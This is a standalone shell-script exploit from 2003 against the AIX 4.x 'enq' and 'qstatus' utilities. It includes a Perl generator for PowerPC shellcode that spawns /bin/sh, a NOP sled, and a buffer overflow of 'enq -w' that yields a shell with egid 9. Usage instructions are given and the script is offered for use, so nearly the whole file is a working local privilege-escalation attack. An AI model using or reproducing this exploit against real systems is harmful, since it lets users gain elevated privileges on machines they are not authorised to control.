#!/bin/sh
# FileName: ex_enq_aix4x.sh
# Exploit "enq & qstatus" of Aix4.x to get egid=9 shell.
# Usage   : chmod ex_enq_aix4x.sh ; ./ex_enq_aix4x.sh
# Tested  : on Aix4.3.3
# Author  : watercloud@xfocus.org
# Site    : www.xfocus.org   www.xfocus.net
# Date    : 2003-4-24
# Announce: use as your owner risk!

PERL=/usr/bin/perl
TMP=/tmp/.env.tmp
SHPL=/tmp/.sh.pl
cat >$SHPL<<EOF
#!/usr/bin/perl
\$BUFF="";

\$BUFF.="\x7c\xa5\x2a\x79"x500;

\$OSLEVEL=\`/usr/bin/oslevel\`;
\$ID="\x04";
if( \$OSLEVEL=~/4\.1/ ) {
  \$ID="\x03";
} elsif(\$OSLEVEL=~/4\.3\.3/) {
  \$ID="\x03";
} elsif( \$OSLEVEL=~/4\.2/ ) {
  \$ID="\x02";
}


\$BUFF.="\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7f\xe8\x02\xa6";
\$BUFF.="\x3b\xff\x01\x20\x38\x7f\xff\x08\x38\x9f\xff\x10";
\$BUFF.="\x90\x7f\xff\x10\x90\xbf\xff\x14\x88\x5f\xff\x0f";
\$BUFF.="\x98\xbf\xff\x0f\x4c\xc6\x33\x42\x44\xff\xff\x02";
\$BUFF.="/bin/sh";



\$BUFF.=\$ID;

print \$BUFF;
EOF

env | awk -F = '{print "unset "$1;}'|grep -v LOGNAME > $TMP
. $TMP
/bin/rm -f $TMP

CC=A`$PERL $SHPL` ; export CC
/bin/rm -f $SHPL
/usr/bin/enq -w"`perl -e 'print "\x2f\xf2\x2b\x10"x600'`"   

#EOF